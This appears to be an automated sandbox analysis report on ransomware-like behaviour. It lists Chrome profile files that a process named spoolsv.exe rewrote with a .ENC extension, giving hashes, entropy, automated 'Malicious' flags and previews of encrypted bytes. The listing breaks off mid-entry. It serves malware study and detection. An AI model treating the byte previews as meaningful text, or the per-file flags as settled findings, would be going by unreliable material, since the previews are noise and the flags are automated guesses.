                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20496
                                                                                                                                                                                                                                                      Entropy (8bit):7.991391306798366
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:Nf/UrHzqqDqeOnCHpdaQqExnW/GCOs9rSCS7kJ6dexrh2Kx+ytzpO2h4m0f:NoxqGpFCzrS1kUIx9Vxnw2Sm0f
                                                                                                                                                                                                                                                      MD5:27B8A58767EB5D41742D1D9A4A4BA81C
                                                                                                                                                                                                                                                      SHA1:B8825637A9C3C01F725A0F4BE42D94747A993757
                                                                                                                                                                                                                                                      SHA-256:A9ABF3CEEDFBF6B5E36A3C7E248370BF31D5B5540B129B35727B9274CB18FB26
                                                                                                                                                                                                                                                      SHA-512:E466C1FD1FD485FB749CFC5D44C5D91CA864DD79DF1AD5E050340E637ECE37BE8FDA421C194C914E77232860C6FCAF5D90CE2F80617D777DF1475EA97CEA149D
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*..........yYx...%..y.I.*6!...%fH...d_....-..<n...yw.e.P..7..$c.ZfE.+ K.d...(...N?.......|..R..'$5w..d.s..F\C..o.B...M.._-.u.C.E.W?.#..Pb.#....w._!)K.+^CK...Y.Kj..9n...&.+.\6].x...yC..`TF.E..{cR..7ENe........l.O.p..........I$Zc...}..|=6.n=.FR.e..WW156.,.0.2.7...z+?.6y.h/..i!,PS...h.Vc....yt$...+.G..v...8...l....n'.\...........S...x....{!.Lt.OR@n[...^PO.p.K..UX.D.Bf.H#........{v.CtI.....YW.M..f...i...]j....0........*.....Q...7C1.a.nGa.Yo.Vg/D+.2*....z..K.._'m.).J.ytH../=.~.&".5./....i...............2m.a.-.. ....N.#L....#l..Se..s.5.\..?..kq..|P.Qz.Q..Kx<...8M..~..S..Wb....`..IQ...C.m..z...D1g....W.}.._...oa.z_...VEAA.@=....[Y..(..9.,..'\)Byz.n.5l.].3.vub'.....#.K".q`.....z8.+)....i..a2.5...,V..=..T....._....6.....'$..s6]....B.-.}.].....~sP.RgF....N.~...<.......>..E.4..qL..QCU.(.J...V.hXC'....$.C.J]...HP.._.~..P..iv1........8...j.....csCYwv.{.. '7k. .."...s...._..>...C..m..e........+p.0.&..no..R..*j.p..\.gg&...P.QM@i..P.Ky].U.....K.M.|.B..z...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\CURRENT.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QRzgTczBv:Q5d
                                                                                                                                                                                                                                                      MD5:328FC1F4C693CE30D6A0FB47D34D59E3
                                                                                                                                                                                                                                                      SHA1:A49BAAFDEFA3CE958AA56709FF598FBA601A8798
                                                                                                                                                                                                                                                      SHA-256:F6F0E310BCA7FD98AA03FE19DDCBB88434AFBBBC51A64774405F82DD457CBA2B
                                                                                                                                                                                                                                                      SHA-512:B1CF96413C6D8BEB6D3A6D26CCA9068DF4B7EAD78D4C0E7454AC7D4B938BA49311B060A6C7B8277C7A8A667C6A9A674C0063EA05EAA2F205F110ADB9534A28BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.4.t*..V.h=.#..x..k..Y.$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):304
                                                                                                                                                                                                                                                      Entropy (8bit):7.324419320894189
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:SnAOHTvXVRVTqCIaJd3+Fac1xSFo7ljmpAxk6u8x0d:SAOzvXjVOLK3+FXjSF1D6ZE
                                                                                                                                                                                                                                                      MD5:C1D2CAEAEC4011111413C1762882BE54
                                                                                                                                                                                                                                                      SHA1:A1B25B24A857AAB8C79363A78147DE2A3C385F9B
                                                                                                                                                                                                                                                      SHA-256:6B6D290409DAE9D765D709C8767CF8CA3C8BA353A68C9AD51739BD26B6B7CBC4
                                                                                                                                                                                                                                                      SHA-512:DE8B8BBD7B9C7C20C274C62F37E8EC24808CE24790148DCF42252BBBAC8D24B75569CDB3E5231C43B16DF870921F92EDEDA2A334A395EE2E89B056B86F6389D6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:T......P...Kk&..\tg.U.b..;2....Z..6...c5+..o0............n......0.q.k`...5Z..f.=.&.....6VczB..-.W..A%.U...NJ`...Vw.<[J..........@L....#Yx....}.;.8.l:R.....-.7.D$....s.n1U...Q.l_d..X..l..x.[..Ii.*/>.....H.h..8..V6.q3Ju<..[.R.2......r.q.3@n.[w.. ..*.Q......Z....fcqg.....{..@.xo.,G.;[.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.976476479749426
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:AV/dl0y0I+MPCYUOfuDXy62mNh7u0rivopitLisZ1:lI+CjPkh7uKyOsn
                                                                                                                                                                                                                                                      MD5:67D3449FFB71C8F77E8276A4A7B01E68
                                                                                                                                                                                                                                                      SHA1:66559D1BCF962A19C9B372FF11E5DFBD2BD33EAC
                                                                                                                                                                                                                                                      SHA-256:EB89E207F7202F540EDFF526C592ABCB5CC4CB92FB5AA8A0DFCB292B7EC5DDCF
                                                                                                                                                                                                                                                      SHA-512:21C9A906E8D104F9128255A058EC01BE0927FB2FD0F9B43961BBB29F537319A6B2B34156C2EC3BDD4FE9B875B00B5693ADDFFF4C7500054AFDF4D13D2C377F57
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Z.l._....up......eh..<.S.._YE<M)e...... pKd9.q....=i......!.{..?....@..:.(ZW..P=yI...6.^ .#2..Hk.W..k.y.a. ...].iu.C[3iM'....g.x.b...n.v.;.M....w.G+.W......vY.}..Wp.M.p'.;l^.L..........G...D.4B...X...+^..??.|O".........1...-.v.N|...Vu....K%.y.R!..T.....=?.g....G....$niu...&....!... .gU|....-.~....X...d...D......m+.I..q).EU..u.C.."3...]..CK<..^)+....!r..C..w..&..9.......?......&.1.Y.g..ZL..U...b.u.+..~}..U.w..+~.X)..A..b..>.Y...}.O..._.2i...-G........sj#N.....Pu..F....s.]..d.........@...yu.?".."FzB.sn7..!Sez.v.Y.x....G040`.g......>..{..VrS;.. ......1x..[....k..7qN;v..?......<.........".'..]/X.O....".......c.j.z..XJ....hJ$....&N.}....aa.BF..].\..i7......]...e....[.?L.d...Y..H9\...Q...V.V.....Jy.....59Z..CR.&[e.)OU[...n>..`.Gd..?`..Eu...f.6......=..+"..S.|.^..a..=PN7......+T..Ux;..7......u...]8.b?..wg1!b........=....OI#.|/${..*.2.....,.....V4.Az...C..i1.Hi[.w\K.=... ..T?6....k...N....._%.+..."_Ja..*........b...KAE...W.C.\r..x.<..0...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):270352
                                                                                                                                                                                                                                                      Entropy (8bit):7.999233104629878
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:25hujpp6uK1BmNB+ONY/bJdrl7QfDtxYkYfIHrStor7h:djpjKbqcSQbPrFQfDlxuox
                                                                                                                                                                                                                                                      MD5:944DDF0713D7FE5697B9156C9B86F5C5
                                                                                                                                                                                                                                                      SHA1:ADAF97427D2141AD958E12F05DE767EB74D27140
                                                                                                                                                                                                                                                      SHA-256:41ADB97B614A126E0B195A3F9721FD8C8B8846B927148A1614C4E7B1585715D9
                                                                                                                                                                                                                                                      SHA-512:BAE62EAF26A2DBC68D1FBCF715F3B6B59FCD2FF596D172A457B657BCD298108A425CC492C0FC265BAC852252DFF941C3AA8B580880A0E7D4D11E02D79F6922B6
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:/.NR/.,..[........!>...T..pl...DO...m~r.P....v...p.A_..I .G].....K}.U9C...g..v.} ?....RZ4..E.N...ij...q..N..L.^....9...>q.{%vj.I.e....v...5.._r..eWZe....M|....*-..4._.....~p.........G-<...H...=.U.....?A..DO'F|"....H..R)a.ds..R.kD;&].kk.%...D.=U.1).....z..e.5'......~;oE.1.o.d..7..........">...jq.R.R.f..Q./e..D...".,.B..C........~...i.5.@.s..E.C..pv.l...F...l..^...#.yh/.I..-V.......W....$.~.......Z...Z.`..........m.0.li...{^._Q.....l....:....O..R.Tl....h..."...O..(S....\...ql.~.....j:.d..(0.S....e...z.v2...`...."BS..<.=`.....W7.......7}...m!dF....e.D.n.@..f......a.'..Z._\...9..............q^M0....).[/.....a..I.+.T.....1u6.....s.....+0..\......KXF..........8.Y.\c.\+...~v....e.......k.G7.......NG.Y.......1..'..yA._.z.........r.._`KV....p..gJ..=i..I.Y.r...;.r...QMX....s'.J...m.....1..y0. ..q...z.&....3...x./.?r.D.&...h@l........A.....n....+|F.}...8..r.0...)...?.#.%2R.j....-......6p.1;.\..#..D..M.3.H.....P.G.|...9.B.vT....a.@.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.97783199729344
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:RUHUxe7HbS93HchHpRe963lNr30dKq3C5WakFajRY:OH+9MhJs963lNgK78aiyRY
                                                                                                                                                                                                                                                      MD5:E9570C05758D7F027A0B6D30D775B2AE
                                                                                                                                                                                                                                                      SHA1:0871E5E41EE6DF7681704EDC4A15D0F108CCCF0A
                                                                                                                                                                                                                                                      SHA-256:971C1D9CB490C2100654763CCB68E021CEAF307786ACBC54AB8B5E870528FF55
                                                                                                                                                                                                                                                      SHA-512:C1BB33C8AD522EABC58BD7DC564ABB99FE2D6F3F5B839AF5CBBE2C31CDDCBF2D543625D5E0D8741C06CCF8CACF58B33DFDA9CBAEEBAC72F03182F4B882F0CF7B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:O4'|."c.V...}.j..V!.5.c..:..E..}O..*.....nv..}...*k.f...q....mUe$4..~.G...M.-]......V.i.s....o..hRQ.........nc...q.xb.rNg.....K..6.R....9u.:.*...... ..;...#.......wb....ia.Z....sy.m...........J=.-.5.K9..hu.:.;*u...A$...<u.#..<......_>._.m..n.v..rH......C.|...s$.P...h3..T..v..../|U...!~9...s".d...w..S...D...y......R..Ws..5...X..9T.(.e..N....Q....x.].....~E........h.0.`~..u:Z@?w...m....Y...0..3..W.........\....]....AR.73T9....H...~..7Z..Y`cI.B.9.LZ.]....:.I.g#...4.@...fa.....~;L.......7.8.R.5E.5g.....)w...........|.>......|.&;.G!.....6.-...oD\!.[..~....,|n.%._.l:..p.w..bF.O@......Q..MZn%..="B,..:./.ZJi>&#.c3j.O.M.f.....fhH;.....A.......0}b......` .C..0?...bU....ZX.b&..B2w9..8..%...>A..O..Y..w.U.Z.G.....?..[]|....M.rs..r..$.._U..k...Yb...[I..+......i_!n'o.d....^..Y...3.Bu..C..f...U.y..y.&c...\.(9ZG$B(.....w.....^}..g!.......uE..=SQJm..z...Kv.P....iu.i.F.G.P.#y.Z.J......@..)$..}.^...t.f.+........SJ....a~]b......m;.........Y..XLj9.d_5.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.9802964289991625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:cMysjkwUFxfDdZ8iQPD5V/6ZukJ8TDs2KPTBpk:9zAwcrdZ8iODb//kxjk
                                                                                                                                                                                                                                                      MD5:87BE137E9899697BC7B4F1817E491560
                                                                                                                                                                                                                                                      SHA1:61A6C3AB74475A3888BEC9EB379C5D2C000F4461
                                                                                                                                                                                                                                                      SHA-256:8CD873DD292A600FFEE0D755474E11248CEBEA2BD21E5CDF99F54E55B84C0545
                                                                                                                                                                                                                                                      SHA-512:12C722F981BF9A7554BF26559D9CC2FD8B32A2F534953AB65CAB7FB5D8130FF3ECD0FA828346B66D670B3BC3A70906E41944F4C87FF533FCFA71C09DAF703A8A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:OK.c...\O.:..!.......!..A..G.LnHv.P.$.K+).Q.......PL..M$HGP...K$.h..j....u.f..MZ.3................^Z>:..<.G.....<...@.H.B..........K3.?$.].B.?...'iiR+.)``P.G...N..!.|x........t.2#,.A......3...-..e0.x...Db.#A.6....._...../..-..V.W..|&..=._.>-,Q.!&.l...".....J.y....r..i.v...q[.a@{.h.o..%...Z.t.ly...1Q..7.B2...B.......'..}..J.....C#....Q2....W".D.."...M..K.5g<":...2n8!...B.e EK.I....5..,..'...V..;..(^.6.w..=.q.D.g.b2SSe/k[B....b.'..kF....`?x..3X......Sc"i.....tU..H.......Yw...LR).a.[t.....:8.j.i......i<.i..:...k......9.`7...~M.2c.L....)..8....u.?.0J..j.?[.S...C2..u.q...)...5Z.Ss.q.>..&...1....h-.I..?.lY.V.Y+h....2LG..D...-hP...._..0...r.....G.!....?. }.u..wR.....,..&0.....3.oY..9........iP..W...S....|.......P...........f....1......k....+.4.3..Ka....H.x.,..%&...V...4)}.r.M...H..-.2.......m..c..c.,..]..h$..O(.2)...U..4.."..../l.\\!~..`.ZX.....R.....a.....S.....N.DX.;.Q..$F.$_5.E.P"......mPG.R.1.4.n...e.....s....vt.[I^`..#P...N...4.;.4.\#4l

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):262528
                                                                                                                                                                                                                                                      Entropy (8bit):7.999320418665178
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:28ddbNpkQMyIKgyKhiZnY96Amn8UVuBLWMyWpkgL:2ARN8yIKgD4ZY971USDdhL
                                                                                                                                                                                                                                                      MD5:5CD78524100DCB4A9EF54A5122FB8092
                                                                                                                                                                                                                                                      SHA1:FCB91F2F627096032EA2F2B1E1392402F9923FF3
                                                                                                                                                                                                                                                      SHA-256:0BF712C34AE6D20764B6B3F6C6A2643DE948541F984DDD680183146D706621BA
                                                                                                                                                                                                                                                      SHA-512:F3175A13EB7AE1279C0244B133F979B2A563E3E31EAD36A21FAB0F71B8023E9F0D181A5AFA02EE41F82F15924ACEC6BCAA810241889FB70F682B898B22F8ED3B
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:)]w.p.......~..e.M.....=.G...A.....E'W6.|n...9...m(...E.B....a".6...{..x..Z..oB..d.......%.......r..0b`.7..I.ha..'..XY2..."....j.m5.BK.-.+.U...$.Q.`..">T.\.m...G..".......`f.B.I..S.PjO....'\'Q.Nl.....R.......!......f[".....^MJ.K.23s.$U]e....K.R!?&..)...Tj.$d./!.."2EP.R.c..A.%..3....>....I...t.3..a..>.J........".(f-._...`..t7:.)..(U.YHqW..n.w.(...-x.....}..{$E...s.6.x......../.>.....g.KIrl_....>..us]W....Z<m?.E.Z...-Z..[.%....a.C..T...$m...-|..4....]........<.c....u6..[Q(=.V|.}..z....l...s>L...l..M....m..@M ..z....M@.[.Z."GTqx^"df.^.\......DE.E.F'PP...%....znZcn..8.n..iQ.m..]..:..M.s....ETh.....W!.Q.....5.#x.s.5..*.$.........y.|.[.......#up.JT|1.a..e.<%%Bel..)x.H....}.p..(Z..L..6.l.`..f._|.=....._V..m.SiK....U.Yg.......-#Mp...t.\..4...}...>.{.3.f.h...._p.M..1.1."...G.....Mm....6.8H.P.t..bJ..b...F.B....B...1...V..Gk$..... 6....9..m..iM.p.~K,L'.s.Z..?.o.G...D..&{U.s..F...~.)..J...\ .....{.W.X...-y.".f...T.^.R...,_T..$...H......].>T.b

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197808
